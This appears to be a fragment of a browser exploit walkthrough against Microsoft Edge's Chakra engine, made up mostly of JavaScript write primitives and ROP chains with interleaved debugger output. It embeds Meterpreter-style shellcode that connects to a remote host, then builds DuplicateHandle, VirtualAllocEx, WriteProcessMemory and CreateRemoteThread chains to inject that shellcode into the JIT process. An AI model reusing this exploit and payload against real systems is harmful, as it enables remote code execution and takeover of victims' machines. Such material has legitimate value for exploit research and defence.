	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x56d23148, 0x528b4865);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x528b4860, 0x528b4818);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc9314d20, 0x50728b48);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4ab70f48, 0xc031484a);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x7c613cac, 0x41202c02);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x410dc9c1, 0xede2c101);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x528b4852, 0x8b514120);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x01483c42, 0x788166d0);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x0f020b18, 0x00007285);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x88808b00, 0x48000000);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x6774c085, 0x44d00148);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x5020408b, 0x4918488b);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x56e3d001, 0x41c9ff48);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4d88348b, 0x0148c931);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc03148d6, 0x0dc9c141);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc10141ac, 0xf175e038);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x244c034c, 0xd1394508);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4458d875, 0x4924408b);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4166d001, 0x44480c8b);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x491c408b, 0x8b41d001);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x01488804, 0x415841d0);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x5a595e58, 0x59415841);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x83485a41, 0x524120ec);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4158e0ff, 0x8b485a59);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xff4be912, 0x485dffff);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4953db31, 0x6e6977be);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x74656e69, 0x48564100);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc749e189, 0x26774cc2);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x53d5ff07, 0xe1894853);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x314d5a53, 0xc9314dc0);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xba495353, 0xa779563a);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x0ee8d5ff);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x31000000, 0x312e3237);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x35352e36, 0x3539312e);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x89485a00, 0xc0c749c1);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x000001bb, 0x53c9314d);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x53036a53, 0x8957ba49);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x0000c69f, 0xd5ff0000);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x000023e8, 0x2d652f00);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x65503754, 0x516f3242);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x58643452, 0x6b47336c);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x67377674, 0x4d576c79);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x3764757a, 0x0078466a);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x53c18948, 0x4d58415a);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4853c931, 0x280200b8);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000084, 0x53535000);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xebc2c749, 0xff3b2e55);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc68948d5, 0x535f0a6a);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xf189485a, 0x4dc9314d);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x5353c931, 0x2dc2c749);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xff7b1806, 0x75c085d5);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc1c7481f, 0x00001388);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xf044ba49, 0x0000e035);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xd5ff0000, 0x74cfff48);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xe8cceb02, 0x00000055);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x406a5953, 0xd189495a);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4910e2c1, 0x1000c0c7);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xba490000, 0xe553a458);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x9348d5ff);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x89485353, 0xf18948e7);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x49da8948, 0x2000c0c7);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x89490000, 0x12ba49f9);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00e28996, 0xff000000);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc48348d5, 0x74c08520);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x078b66b2, 0x85c30148);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x58d275c0, 0x006a58c3);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc2c74959, 0x56a2b5f0);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x0000d5ff);

	// Increment countMe (which is the variable used to write 1 QWORD at a time) by 0x50 bytes to give us some breathing room between our shellcode and ROP chain
	countMe += 0x50;

	// Store where our ROP chain begins
	ropBegin = countMe;

	// VirtualProtect() ROP chain (will be called in the JIT process)
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x577fd4, chakraHigh);         // 0x180577fd4: pop rax ; ret
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x72E128, chakraHigh);         // .data pointer from chakra.dll with a non-zero value to bypass cmp r8d, [rax] future gadget
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x46377, chakraHigh);          // 0x180046377: pop rcx ; ret
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x74e030, chakraHigh);         // PDWORD lpflOldProtect (any writable address -> Eventually placed in R9)
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0xf6270, chakraHigh);          // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding for add rsp, 0x28
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding for add rsp, 0x28
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding for add rsp, 0x28
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding for add rsp, 0x28
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding for add rsp, 0x28
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x46377, chakraHigh);          // 0x180046377: pop rcx ; ret

    // Store the current offset within the .data section into a var
    ropoffsetOne = countMe;

    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x00000000);                // LPVOID lpAddress (Eventually will be updated to the address we want to mark as RWX, our shellcode)
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x1d2c9, chakraHigh);          // 0x18001d2c9: pop rdx ; ret
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00001000, 0x00000000);                // SIZE_T dwSize (0x1000)
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000040, 0x00000000);                // DWORD flNewProtect (PAGE_EXECUTE_READWRITE)
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x577fd4, chakraHigh);         // 0x180577fd4: pop rax ; ret
    write64(chakraLo+0x74b000+countMe, chakraHigh, kernelbaseLo+0x61700, kernelbaseHigh);  // KERNELBASE!VirtualProtect
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x272beb, chakraHigh);         // 0x180272beb: jmp rax (Call KERNELBASE!VirtualProtect)
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x118b9, chakraHigh);          // 0x1800118b9: add rsp, 0x18 ; ret
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x4c1b65, chakraHigh);         // 0x1804c1b65: pop rdi ; ret

    // Store the current offset within the .data section into a var
    ropoffsetTwo = countMe;

    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x00000000);                // Will be updated with the VirtualAllocEx allocation (our shellcode)
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x1ef039, chakraHigh);         // 0x1801ef039: push rdi ; ret (Return into our shellcode)

    // We can reliably traverse the stack 0x6000 bytes
    // Scan the stack for the return address below
    0:020> u chakra+0xd4a73
    00007fff`3a454a73 488b5c2478      mov     rbx,qword ptr [rsp+78h]
    00007fff`3a454a78 4883c440        add     rsp,40h
    00007fff`3a454a7c 5f              pop     rdi
    00007fff`3a454a7d 5e              pop     rsi
    00007fff`3a454a7e 5d              pop     rbp
    00007fff`3a454a7f c3              ret

    // Creating an array to store the return address because read64() returns an array of 2 32-bit values
    var returnAddress = new Uint32Array(0x4);
    returnAddress[0] = chakraLo + 0xd4a73;
    returnAddress[1] = chakraHigh;

	// Counter variable
	let counter = 0x6000;

	// Loop
	while (counter != 0)
	    // Store the contents of the stack
	    tempContents = read64(stackleakPointer[0]+counter, stackleakPointer[1]);

	    // Did we find our target return address?
        if ((tempContents[0] == returnAddress[0]) && (tempContents[1] == returnAddress[1]))
			document.write("[+] Found our return address on the stack!");
            document.write("[+] Target stack address: 0x" + hex(stackleakPointer[1]) + hex(stackleakPointer[0]+counter));

            // Break the loop

        	// Decrement the counter
	    	// This is because the leaked stack address is near the stack base so we need to traverse backwards towards the stack limit
	    	counter -= 0x8;

	// Confirm exploit 
	alert("[+] Press OK to enjoy the Meterpreter shell :)");

	// Store the value of the handle to the JIT server by way of chakra!ScriptEngine::SetJITConnectionInfo (chakra!JITManager+s_jitManager+0x8)
	jitHandle = read64(chakraLo+0x74d838, chakraHigh);

	// Helper function to be called after each stack write to increment offset to be written to
	function next()

	// Begin ROP chain
	// Since __fastcall requires parameters 5 and so on to be at RSP+0x20, we actually have to put them at RSP+0x28
	// This is because we don't push a return address on the stack, as we don't "call" our APIs, we jump into them
	// Because of this we have to compensate by starting them at RSP+0x28 since we can't count on a return address to push them there for us

	// DuplicateHandle() ROP chain
	// Stage 1 -> Abuse PROCESS_DUP_HANDLE handle to JIT server by performing DuplicateHandle() to get a handle to the JIT server with full permissions
	// ACG is disabled in the JIT process
	// https://bugs.chromium.org/p/project-zero/issues/detail?id=1299

	// Writing our ROP chain to the stack, stack+0x8, stack+0x10, etc. after return address overwrite to hijack control-flow transfer

	// HANDLE hSourceProcessHandle (RCX) _should_ come first. However, we are configuring this parameter towards the end, as we need RCX for the lpTargetHandle parameter

	// HANDLE hSourceHandle (RDX)
	// (HANDLE)-1 value of current process
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Pseudo-handle to current process

	// HANDLE hTargetProcessHandle (R8)
	// (HANDLE)-1 value of current process
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48

	// LPHANDLE lpTargetHandle (R9)
	// This needs to be a writable address where the full JIT handle will be stored
	// Using .data section of chakra.dll in a part where there is no data
	0:053> dqs chakra+0x72E000+0x20010
	00007ffc`052ae010  00000000`00000000
	00007ffc`052ae018  00000000`00000000
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72e128, chakraHigh);      // .data pointer from chakra.dll with a non-zero value to bypass cmp r8d, [rax] future gadget
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server;
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28

	// HANDLE hSourceProcessHandle (RCX)
	// Handle to the JIT process from the content process
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
	write64(stackleakPointer[0]+counter, stackleakPointer[1], jitHandle[0], jitHandle[1]);         // PROCESS_DUP_HANDLE HANDLE to JIT server

	// Call KERNELBASE!DuplicateHandle
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
	write64(stackleakPointer[0]+counter, stackleakPointer[1], duplicateHandle[0], duplicateHandle[1]); // KERNELBASE!DuplicateHandle (Recall this was our original leaked pointer var for kernelbase.dll)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!DuplicateHandle)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!DuplicateHandle - 0x180243949: add rsp, 0x38 ; ret
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // DWORD dwDesiredAccess (RSP+0x28)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // BOOL bInheritHandle (RSP+0x30)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000002, 0x00000000);             // DWORD dwOptions (RSP+0x38)

	// VirtuaAllocEx() ROP chain
	// Stage 2 -> Allocate memory in the Edge JIT process (we have a full handle there now)

	// DWORD flAllocationType (R9)
	// MEM_RESERVE (0x00002000) | MEM_COMMIT (0x00001000)
	0:031> ? 0x00002000 | 0x00001000 
	Evaluate expression: 12288 = 00000000`00003000
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00003000, 0x00000000);             // MEM_RESERVE | MEM_COMMIT
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28

	// SIZE_T dwSize (R8)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00001000, 0x00000000);             // 0x1000 (shellcode size)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48

	// LPVOID lpAddress (RDX)
	// Let VirtualAllocEx decide where the memory will be located
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL address (let VirtualAllocEx deside where we allocate memory in the JIT process)

	// HANDLE hProcess (RCX)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
	next();                                                                     				   // Recall RAX already has a writable pointer in it

	// Call KERNELBASE!VirtualAllocEx
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
	write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0xff00, kernelbaseHigh); // KERNELBASE!VirtualAllocEx address 
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!VirtualAllocEx)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!VirtualAllocEx - 0x180243949: add rsp, 0x38 ; ret
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)         
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // DWORD flProtect (RSP+0x28) (PAGE_READWRITE)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38

	// WriteProcessMemory() ROP chain
	// Stage 3 -> Write our shellcode into the JIT process

	// Store the VirtualAllocEx return address in the .data section of kernelbase.dll (It is currently in RAX)

	0:015> dq kernelbase+0x216000+0x4000 L2
	00007fff`58cfa000  00000000`00000000 00000000`00000000
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
	write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where we will store VirtualAllocEx allocation
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)

	// SIZE_T nSize (R9)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00001000, 0x00000000);             // SIZE_T nSize (0x1000)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28

	// HANDLE hProcess (RCX)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which holds our full perms handle to JIT server
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
	next();                                                                     // Recall RAX already has a writable pointer in it

	// LPVOID lpBaseAddress (RDX)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
	write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000-0x8, kernelbaseHigh); // .data section of kernelbase.dll where we have our VirtualAllocEx allocation
	next();                                                                            // (-0x8 to compensate for below where we have to read from the address at +0x8 offset
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x255fa0, chakraHigh);       // mov rdx, qword [rdx+0x08] ; mov rax, rdx ; ret

	// LPCVOID lpBuffer (R8) (shellcode in chakra.dll .data section)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000, chakraHigh);    	  // .data section of chakra.dll holding our shellcode

	// Call KERNELBASE!WriteProcessMemory
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
	write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)         
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38

	// CreateRemoteThread() ROP chain
	// Stage 4 -> Create a thread within the JIT process, but create it suspended
	// This will allow the thread to _not_ execute until we are ready
	// LPTHREAD_START_ROUTINE can be set to anything, as CFG will check it and we will end up setting RIP directly later
	// We will eventually hijack RSP of this thread with a ROP chain, and by setting RIP to a return gadget our thread, when executed, will return into our ROP chain
	// We will update the thread later via another ROP chain to call SetThreadContext()

	// LPTHREAD_START_ROUTINE lpStartAddress (R9)
	// This can be any random data, since it will never be executed
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x28b4fe, chakraHigh);	   // 0x180043c63: Anything we want - this will never get executed
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
